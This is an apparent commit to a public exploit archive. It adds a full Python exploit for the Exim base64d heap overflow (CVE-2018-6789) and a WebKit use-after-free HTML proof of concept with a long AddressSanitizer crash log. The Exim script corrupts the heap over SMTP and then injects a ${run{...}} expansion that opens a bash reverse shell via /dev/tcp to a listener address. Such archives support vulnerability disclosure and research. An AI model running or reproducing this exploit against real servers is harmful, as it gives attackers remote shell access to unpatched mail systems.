DB: 2018-05-03

11 changes to exploits/shellcodes WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free LibreOffice/Open Office - '.odt' Information Disclosure Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) ASUS infosvr - Auth Bypass Command Execution (Metasploit) ASUS infosvr - Authentication Bypass Command Execution (Metasploit) Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) xdebug < 2.5.5 - Unauthenticated OS Command Execution (Metasploit) Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit) Metasploit Framework - 'msfd' Remote Code Execution (Metasploit) Exim < 4.90.1 - 'base64d' Remote Code Execution Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery
2018-05-03 05:01:45 +00:00 · 2018-05-03 05:01:45 +00:00 · be89b7c04a
commit be89b7c04a
parent 8e5b315870
10 changed files with 754 additions and 2 deletions
--- a/exploits/linux/remote/44571.py
+++ b/exploits/linux/remote/44571.py
@ -0,0 +1,95 @@
+#!/usr/bin/python
+import time
+import socket
+import struct
+s = None
+f = None
+def logo():
+   print
+   print "        CVE-2018-6789 Poc Exploit"
+   print "@straight_blast ; straightblast426@gmail.com"
+   print
+def connect(host, port):
+   global s
+   global f
+   s = socket.create_connection((host,port))
+   f = s.makefile('rw', bufsize=0)
+def p(v):
+   return struct.pack("<Q", v)
+def readuntil(delim='\n'):
+   data = ''
+   while not data.endswith(delim):
+      data += f.read(1)
+   return data
+def write(data):
+   f.write(data + "\n")
+def ehlo(v):
+   write("EHLO " + v)
+   readuntil('HELP')
+def unrec(v):
+   write(v)
+   readuntil('command')
+def auth_plain(v):
+   encode = v.encode('base64').replace('\n','').replace('=','')
+   write("AUTH PLAIN " + encode)
+   readuntil('data')
+def one_byte_overwrite():
+   v = "C" * 8200
+   encode = v.encode('base64').replace('\n','').replace('=','')
+   encode = encode[:-1] + "PE"
+   write("AUTH PLAIN " + encode)
+   readuntil('data')
+def exploit():
+   logo()
+   connect('localhost', 25)
+   print "[1] connected to target"
+   time.sleep(0.5)   
+   
+   ehlo("A" * 8000)     
+   ehlo("B" * 16)
+   print "[2] created free chunk size 0x6060 in unsorted bin"
+   
+   unrec("\xff" * 2000)
+   ehlo("D" * 8200)
+   one_byte_overwrite()
+   print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"
+   
+   fake_header  = p(0) 
+   fake_header += p(0x1f51)
+   auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))
+   print "[4] patched chunk with fake header so extended chunk can be freed"
+   
+   ehlo("F" * 16)
+   print "[5] freed extended chunk"
+   
+   unrec("\xff" * 2000)
+   unrec("\xff" * 2000)
+   print "[6] occupied 1st and 3rd item in unsorted bin with fillers"
+   
+   fake_header  = p(0x4110)
+   fake_header += p(0x1f50)   
+   auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))
+   print "[7] patched chunk with fake header so extended chunk can be allocated"
+   
+   address = 0x55d7e5864480
+   auth_plain("H" * 8200 + p(0x2021) + p(address)  + p(0x2008) + "H" * 184)
+   print "[8] overwrite 'next' pointer with ACL store block address"
+   
+   ehlo("I" * 16)
+   print "[9] freed the ACL store block"
+   
+   acl_smtp_rcpt_offset = 288
+   local_host = '192.168.0.159'
+   local_port = 1337
+   cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
+   cmd_expansion_string = "${run{" + cmd + "}}\0"
+   auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) 
+   print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"
+
+   write("MAIL FROM:<test@pwned.com>")
+   readuntil("OK")
+   write("RCPT TO:<shell@pwned.com>")   
+   print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
+   print
+if __name__ == '__main__':
+   exploit()
--- a/exploits/multiple/dos/44566.html
+++ b/exploits/multiple/dos/44566.html
@ -0,0 +1,184 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 227958 on OSX.
+
+PoC (Note: It might take multiple refreshes for the issue to be triggered):
+
+=================================================================
+-->
+
+<style>
+input:enabled { content: url(#foo);  padding-top: 0vmin }
+.class4 { -webkit-transform: scale(1, 255); }
+</style>
+<script>
+function jsfuzzer() {
+  document.head.appendChild(kg);
+  var test = input.scrollHeight;
+}
+</script>
+<body onload=jsfuzzer()>
+<keygen id="kg" class="class4">
+<input id="input" type="search">
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==26541==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200009e4b8 at pc 0x0003000e0a07 bp 0x7ffee44084a0 sp 0x7ffee4408498
+READ of size 8 at 0x61200009e4b8 thread T0
+==26541==WARNING: invalid path to external symbolizer!
+==26541==WARNING: Failed to use and restart external symbolizer!
+    #0 0x3000e0a06 in WTF::Ref<WebCore::StyleRareInheritedData, WTF::DumbPtrTraits<WebCore::StyleRareInheritedData> >::ptr() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0a06)
+    #1 0x3000e09d8 in WebCore::DataRef<WebCore::StyleRareInheritedData>::operator->() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe09d8)
+    #2 0x300d6d71c in WebCore::RenderStyle::effectiveZoom() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd6d71c)
+    #3 0x3020214af in WebCore::adjustForAbsoluteZoom(int, WebCore::RenderStyle const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20214af)
+    #4 0x3008d391d in WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8d391d)
+    #5 0x3008be66d in long long WebCore::IDLAttribute<WebCore::JSElement>::get<&(WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)3>(JSC::ExecState&, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8be66d)
+    #6 0x310cb067a in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bab67a)
+    #7 0x310654a73 in llint_slow_path_get_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x154fa73)
+    #8 0x30f10a00f in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x500f)
+    #9 0x30f10e1a6 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x91a6)
+    #10 0x30f106e2f in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e2f)
+    #11 0x31057f045 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x147a045)
+    #12 0x3104ff3b0 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13fa3b0)
+    #13 0x31095ad49 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1855d49)
+    #14 0x31095aedb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1855edb)
+    #15 0x31095b281 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1856281)
+    #16 0x301c7d758 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1c7d758)
+    #17 0x301cbea2b in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1cbea2b)
+    #18 0x3022b2c9e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x22b2c9e)
+    #19 0x3022a5b49 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x22a5b49)
+    #20 0x302b1730e in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b1730e)
+    #21 0x302b27c4d in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b27c4d)
+    #22 0x3021decff in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21decff)
+    #23 0x3021d80c0 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d80c0)
+    #24 0x3029ca1f2 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29ca1f2)
+    #25 0x302ab56a3 in WebCore::CachedResourceLoader::loadDone(bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ab56a3)
+    #26 0x302a44ce5 in WebCore::SubresourceLoader::notifyDone() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a44ce5)
+    #27 0x302a41ff6 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a41ff6)
+    #28 0x10c4f6dcb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xceadcb)
+    #29 0x10c4fa12e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xcee12e)
+    #30 0x10c4f961f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xced61f)
+    #31 0x10bb95660 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x389660)
+    #32 0x10b948c6e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13cc6e)
+    #33 0x10b952a06 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x146a06)
+    #34 0x3110f68fc in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff18fc)
+    #35 0x3110f7246 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff2246)
+    #36 0x7fff51301720 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3720)
+    #37 0x7fff513bb0ab in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d0ab)
+    #38 0x7fff512e425f in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8625f)
+    #39 0x7fff512e36dc in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x856dc)
+    #40 0x7fff512e2f42 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84f42)
+    #41 0x7fff505fae25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
+    #42 0x7fff505fab95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
+    #43 0x7fff505fa913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
+    #44 0x7fff4e8c5f5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
+    #45 0x7fff4f05bb4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
+    #46 0x7fff4e8bad6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
+    #47 0x7fff4e889f19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
+    #48 0x7fff78ec742e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
+    #49 0x7fff78ec6081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
+    #50 0x10b7f44d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #51 0x7fff78bfa114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
+
+0x61200009e4b8 is located 120 bytes inside of 320-byte region [0x61200009e440,0x61200009e580)
+freed by thread T0 here:
+    #0 0x10f4affa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x31114aacd in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2045acd)
+    #2 0x303573f57 in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<320u>, WebCore::RenderSearchField>(bmalloc::api::IsoHeap<WebCore::RenderSearchField>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3573f57)
+    #3 0x303386052 in WebCore::RenderElement::removeAndDestroyChild(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3386052)
+    #4 0x3037eb844 in WebCore::RenderTreeBuilder::removeFromParentAndDestroyCleaningUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37eb844)
+    #5 0x3038020f2 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType)::$_5::operator()(unsigned int) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38020f2)
+    #6 0x3038002d8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38002d8)
+    #7 0x3037fea62 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fea62)
+    #8 0x3037fe189 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fe189)
+    #9 0x3037fd8aa in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fd8aa)
+    #10 0x3021d7602 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d7602)
+    #11 0x3021d8cf1 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d8cf1)
+    #12 0x302ba4d59 in WebCore::LayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba4d59)
+    #13 0x302bb44d2 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bb44d2)
+    #14 0x302d57ec3 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d57ec3)
+    #15 0x302d5a87f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d5a87f)
+    #16 0x302b9f87b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b9f87b)
+    #17 0x302ba1466 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba1466)
+    #18 0x302ba5119 in WebCore::LayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ba5119)
+    #19 0x3021d991c in WebCore::Document::updateLayoutIfDimensionsOutOfDate(WebCore::Element&, WebCore::DimensionsCheck) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d991c)
+    #20 0x30227defd in WebCore::Element::scrollHeight() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x227defd)
+    #21 0x3035e3454 in WebCore::RenderTextControlSingleLine::scrollHeight() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35e3454)
+    #22 0x30227df42 in WebCore::Element::scrollHeight() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x227df42)
+    #23 0x3008d391d in WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8d391d)
+    #24 0x3008be66d in long long WebCore::IDLAttribute<WebCore::JSElement>::get<&(WebCore::jsElementScrollHeightGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)3>(JSC::ExecState&, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8be66d)
+    #25 0x310cb067a in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bab67a)
+    #26 0x310654a73 in llint_slow_path_get_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x154fa73)
+    #27 0x30f10a00f in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x500f)
+    #28 0x30f10e1a6 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x91a6)
+    #29 0x30f106e2f in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e2f)
+
+previously allocated by thread T0 here:
+    #0 0x10f4afa3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff78da2200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
+    #2 0x311150cf4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x204bcf4)
+    #3 0x31114a9c8 in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x20459c8)
+    #4 0x30356ed29 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<320u>, WebCore::RenderSearchField>(bmalloc::api::IsoHeap<WebCore::RenderSearchField>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x356ed29)
+    #5 0x3026e720d in std::__1::unique_ptr<WebCore::RenderSearchField, WebCore::RenderObjectDeleter> WebCore::createRenderer<WebCore::RenderSearchField, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26e720d)
+    #6 0x3026e7156 in WebCore::SearchInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26e7156)
+    #7 0x3025c6ef6 in WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c6ef6)
+    #8 0x3038005ae in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38005ae)
+    #9 0x3037febf6 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37febf6)
+    #10 0x3037fe189 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fe189)
+    #11 0x3037fd8aa in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37fd8aa)
+    #12 0x3021d7602 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d7602)
+    #13 0x3021d8cf1 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21d8cf1)
+    #14 0x3021facd6 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21facd6)
+    #15 0x302744ce4 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2744ce4)
+    #16 0x3029af10b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29af10b)
+    #17 0x30297a96b in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x297a96b)
+    #18 0x302aa7117 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aa7117)
+    #19 0x302aa3f20 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aa3f20)
+    #20 0x302a41fbe in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a41fbe)
+    #21 0x10c4f6dcb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xceadcb)
+    #22 0x10c4fa12e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xcee12e)
+    #23 0x10c4f961f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xced61f)
+    #24 0x10bb95660 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x389660)
